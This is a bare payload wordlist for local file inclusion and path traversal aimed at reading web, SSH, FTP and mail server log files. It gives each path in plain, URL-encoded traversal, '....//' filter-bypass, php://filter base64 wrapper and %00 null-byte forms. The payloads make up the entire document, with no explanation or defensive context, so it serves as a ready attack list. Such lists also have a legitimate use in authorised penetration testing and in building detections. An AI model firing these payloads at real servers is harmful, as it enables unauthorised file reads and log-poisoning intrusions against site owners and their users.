/var/log/apache/access.log
/var/log/apache2/access.log
/var/log/httpd/access_log
/var/log/httpd-access.log
/var/log/nginx/access.log
/var/log/nginx-access.log
/usr/local/apache/logs/access.log
/usr/local/nginx/logs/access.log
/var/log/apache/access_log
/var/log/apache2/access_log
/var/www/logs/access.log
/var/www/logs/access_log
/var/log/mail
/var/log/sshd.log
/var/log/vsftpd.log
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fapache%2Flogs%2Faccess.log
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Fwww%2Flogs%2Faccess.log
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr%2Flocal%2Fapache%2Flogs%2Faccess.log
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Flog%2Fapache2%2Faccess.log
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Flog%2Fhttpd%2Faccess_log
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Flog%2Fhttpd-access.log
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Flog%2Fapache%2Faccess.log
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Flog%2Fapache%2Faccess_log
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Flog%2Fapache2%2Faccess_log
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Flog%2Fapache2%2Faccess.log
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Fwww%2Flogs%2Faccess_log
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Fwww%2Flogs%2Faccess.log
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Flog%2Fnginx%2Faccess.log
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Flog%2Fnginx%2Faccess_log
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr%2Flocal%2Fnginx%2Flogs%2Faccess.log
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr%2Flocal%2Fnginx%2Flogs%2Faccess_log
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Flog%2Fnginx-access.log
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Flog%2Fnginx-access_log
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr%2Flocal%2Fapache%2Flogs%2Faccess.log
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr%2Flocal%2Fapache%2Flogs%2Faccess_log
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr%2Flocal%2Fapache%2Flog%2Ferror_log
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr%2Flocal%2Fapache2%2Flog%2Ferror_log
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Flog%2Fmail
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Flog%2Fsshd.log
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Flog%2Fvsftpd.log
....//....//....//....//....//....//....//....//var/log/apache/access.log
....//....//....//....//....//....//....//....//var/log/apache2/access.log
....//....//....//....//....//....//....//....//var/log/httpd/access_log
....//....//....//....//....//....//....//....//var/log/httpd-access.log
....//....//....//....//....//....//....//....//var/log/nginx/access.log
....//....//....//....//....//....//....//....//var/log/nginx-access.log
....//....//....//....//....//....//....//....//usr/local/apache/logs/access.log
....//....//....//....//....//....//....//....//usr/local/nginx/logs/access.log
....//....//....//....//....//....//....//....//var/log/apache/access_log
....//....//....//....//....//....//....//....//var/log/apache2/access_log
....//....//....//....//....//....//....//....//var/www/logs/access.log
....//....//....//....//....//....//....//....//var/www/logs/access_log
....//....//....//....//....//....//....//....//var/log/mail
....//....//....//....//....//....//....//....//var/log/sshd.log
....//....//....//....//....//....//....//....//var/log/vsftpd.log
..//..//..//..//..//var/log/apache/access.log
..//..//..//..//..//var/log/apache2/access.log
..//..//..//..//..//var/log/httpd/access_log
..//..//..//..//..//var/log/httpd-access.log
..//..//..//..//..//var/log/nginx/access.log
..//..//..//..//..//var/log/nginx-access.log
..//..//..//..//..//usr/local/apache/logs/access.log
..//..//..//..//..//usr/local/nginx/logs/access.log
..//..//..//..//..//var/log/apache/access_log
..//..//..//..//..//var/log/apache2/access_log
..//..//..//..//..//var/www/logs/access.log
..//..//..//..//..//var/www/logs/access_log
..//..//..//..//..//var/log/mail
..//..//..//..//..//var/log/sshd.log
..//..//..//..//..//var/log/vsftpd.log
php://filter/convert.base64-encode/resource=/var/log/apache/access.log
php://filter/convert.base64-encode/resource=/var/log/apache/error.log
php://filter/convert.base64-encode/resource=/var/log/apache2/access.log
php://filter/convert.base64-encode/resource=/var/log/apache2/error.log
php://filter/convert.base64-encode/resource=/var/log/nginx/access.log
php://filter/convert.base64-encode/resource=/var/log/nginx/error.log
php://filter/convert.base64-encode/resource=/var/log/vsftpd.log
php://filter/convert.base64-encode/resource=/var/log/sshd.log
php://filter/convert.base64-encode/resource=/var/log/mail
php://filter/convert.base64-encode/resource=/var/log/httpd/error_log
php://filter/convert.base64-encode/resource=/usr/local/apache/log/error_log
php://filter/convert.base64-encode/resource=/usr/local/apache2/log/error_log
var/log/apache/access.log%00
/var/log/apache2/access.log%00
/var/log/httpd/access_log%00
/var/log/httpd-access.log%00
/var/log/nginx/access.log%00
/var/log/nginx-access.log%00
/usr/local/apache/logs/access.log%00
/usr/local/nginx/logs/access.log%00
/var/log/apache/access_log%00
/var/log/apache2/access_log%00
/var/www/logs/access.log%00
/var/www/logs/access_log%00
/var/log/mail%00
/var/log/sshd.log%00
/var/log/vsftpd.log%00
